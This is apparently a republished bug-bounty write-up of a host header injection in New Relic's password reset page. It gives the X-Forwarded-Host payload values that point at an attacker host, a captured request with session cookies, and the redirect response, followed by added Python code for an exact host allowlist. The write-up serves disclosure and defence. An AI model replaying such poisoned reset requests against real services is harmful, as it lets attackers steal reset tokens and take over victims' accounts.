Using Host Header Injection for Account Takeover
2023-10-5 15:35:1 Author: mp.weixin.qq.com

Background

The affected feature is a password reset flow.

Steps to reproduce

  • Open the password reset page: https://login.newrelic.com/passwords/forgot

  • Enter the victim's email address, then click "Reset and Email Password".

  • Intercept the HTTP request in Burp Suite and add an X-Forwarded-Host header with a value like the following:

attacker.com/.newrelic.com

The reset link in the email then looks like this:

https://testing-now.000webhostapp.com/.newrelic.com/passwords/reset/a248d8b06e7b25a116859729cbc0e07e180d9fb197dadc04f30185512eecc811

The victim receives this malicious link in their email. When it is clicked, the victim's password reset link (and with it the reset token) is sent to the attacker-controlled host, which allows a full account takeover.

The request looked like this:

POST /passwords/forgot HTTP/1.1
Host: login.newrelic.com
X-Forwarded-Host: testing-now.000webhostapp.com/.newrelic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close
Referer: https://login.newrelic.com/passwords/forgot
Cookie: _ga=GA1.2.1721374031.1568844736; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.1636905160.1568844739; ei_client_id=5d82b02df99b140010808282; _mkto_trk=id:412-MZS-894&token:_mch-newrelic.com-1568844750536-52713; _fbp=fb.1.1568844751467.1905354417; qca=P0-625668904-1568844751500; optimizelyEndUserId=oeu1568844783430r0.2931045891390677; ajs_anonymous_id=%22b1e86a3a-04a1-48f5-a1c9-37167a1991c8%22; s_fid=78F091CDC3B81C9E-153BD36510D98B56; intercom-id-cyym0u3i=9a67a50f-33f2-4fdb-b74f-7e8d058de750; adroll_fpc=8e6e5aa9e24ca0efac425a4b2c6d4c4e-s2-1568844790580; __ar_v4=YCNZVXZ6TJDJ3KMJRVGKFH%3A20190918%3A3%7CI7ZJI4CQMBCNHGOQ27AYQZ%3A20190918%3A3%7CDLQZ5QQWIFBZZM5ECJME6X%3A20190918%3A3; _golden_gate_session=DlKqVDqbL%2B6%2Fi298zevCA1yH1PgkIDlWIgCVNuUC2CbfqR55ZnQKWXdh8nIl2F3kP4u%2BC9gLAfxsg6jOWfPwuQVDa0GcDhR6VoddruVbqMGjdogry5tZvDs7K8BZkCVH49Z8KHpTXRAv7DJIjEePjX4LcqtNJzRs65Fm6Y97sFIzI4Hvm081ptYeD0Nk543GaLZMtTnT98Rgdu2nftfEV7PrfmqnXKUR%2FDHhVX%2BPjI0qjGZ3PyL3UX9EigZ%2BMcEFiFGPzQXKSW%2BAiVG4Y71rQBOfwm%2FlSz%2B8RGJ0WfEoL%2BBRDquU1w%2BOPxA2r3u8sU02xG4dg07nZeo%3D--SewvpLvUIyY0YJTh--bWuTrIMZhXu6MP8PDg2iZA%3D%3D
Upgrade-Insecure-Requests: 1

The response was:

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 20 Sep 2019 00:49:19 GMT
Location: https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot
Server: nginx
Set-Cookie: _golden_gate_session=Awolm37t0RVohChn8c%2FTtEpVzRz%2BYUXP%2FC6eqVDXqoY7IHMmItXq6vRR%2FLr45q31mXIOFUemqprmptlEuI2mIRy5ZN84OGsjWJWIUnZ34e0ve4IJf0Iqjh%2BbnsP0elEXQ%2B7gm12%2FRlfO4KSXZl7kkKcMrECZo8jQ%2B2SzO9cfYA6DcqNP%2BxlJkqQmQuF8eRXBqGwisVdIBtYqzHLzJDl6n7cZoXW9EyX%2FPMOAuJ3YlxUFoomKE6Z2%2BfgmCKPxeEQRtne%2BvtTJH5xzvNUnyN3JTSNVo4y47xZvjcnYLPzdW1vhptWGxtiyF99zy%2BCqrj11VlLz5PA4Idf0H8OmTqLvzVT42C40SN8qRtz1jP%2BhDjuwDsAr9aDabjj4O41F7AoivfsBXf0vJanmXOmllZXqRiLmiV81nTAEOi5S8EBDbkT3TLrkIu1Uuo2TdkXCDQXyasWXzg%2F1zRI08xOgr6IgdOJhxbZy6Se2ToIMbsYRA532mzLKFXPq2xCIU%2FTuEWdFyXbk4w%2Bo5qH6z21Qqibl32S7VgkN%2Fc61SYJcyipdyJsWWKT6lhHnv%2BHeCGi4OoE3wonpFRm9Z7pNDh%2BamsTtBUOCQgJeNYYnyz35Ggeueeo%2BVYqC46qNpedWs%2B9vXIH%2FRVQguzv9rfU%3D--MxbKlXOo06QW75kP--4a4Glp1aMgEoV2XXukgnIA%3D%3D; path=/; HttpOnly; secure; SameSite=Lax
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: DENY
X-Permitted-Cross-Domain-Policies: none
X-Request-Id: ec1ad038-4b96-4915-b107-3422151a3ab1
X-Runtime: 0.113080
X-Xss-Protection: 1; mode=block
Connection: close
<html><body>You are being <a href="https://testing-now.000webhostapp.com/.newrelic.com/passwords/forgot">redirected</a>.</body></html>
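The defensive counterpart, added here as an illustration and not code from the original report or from New Relic: a reset-link builder that never lets a client-supplied X-Forwarded-Host pick the host in the email. It also shows why a suffix check is not enough: the reported value ends with ".newrelic.com" and would pass one. The allowlist, canonical host and token are constructed for the example.

```python
# Added example (not from the original report): build a password reset link
# without trusting a client-controlled X-Forwarded-Host header.
# TRUSTED_HOSTS and CANONICAL_HOST are constructed for illustration.

TRUSTED_HOSTS = {"login.newrelic.com"}   # hosts the app is legitimately served on
CANONICAL_HOST = "login.newrelic.com"    # used whenever the forwarded host is untrusted

# The value from the report: it ENDS WITH ".newrelic.com", so a suffix test passes it.
REPORTED_PAYLOAD = "testing-now.000webhostapp.com/.newrelic.com"


def naive_suffix_check(host: str) -> bool:
    """The kind of check that lets the reported value through (shown to fail)."""
    return host.endswith(".newrelic.com")


def normalize_authority(value: str):
    """Return the lower-cased host from a bare host[:port], or None when the
    value is not a bare authority (slashes, userinfo, query, whitespace...)."""
    value = value.strip()
    if not value or any(c in value for c in "/\\?#@ \t"):
        return None
    host = value.lower().rstrip(".")
    if ":" in host and not host.startswith("["):
        host = host.rsplit(":", 1)[0]            # drop an explicit port
    return host or None


def is_trusted_host(value: str) -> bool:
    """Exact allowlist match; never a suffix or substring test."""
    host = normalize_authority(value)
    return host is not None and host in TRUSTED_HOSTS


def reset_host(headers: dict) -> str:
    """Host to embed in the reset email. X-Forwarded-Host is honoured only when
    its first hop is exactly a trusted host; otherwise the configured canonical
    host wins, so a poisoned header cannot redirect the token elsewhere."""
    first_hop = headers.get("X-Forwarded-Host", "").split(",")[0]
    if is_trusted_host(first_hop):
        return normalize_authority(first_hop)
    return CANONICAL_HOST


def build_reset_url(headers: dict, token: str) -> str:
    """The link that goes into the email; the path is the one seen in the report."""
    return f"https://{reset_host(headers)}/passwords/reset/{token}"
```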
Source: https://mp.weixin.qq.com/s?__biz=MzIzMTIzNTM0MA==&mid=2247492124&idx=1&sn=64ea88a140460ca83d3ebb9d064ec482&chksm=e8a5e87fdfd26169e90e45009b83bf413a8fe875861448dd50d7393e446d2e942baf45849581&scene=58&subscene=0#rd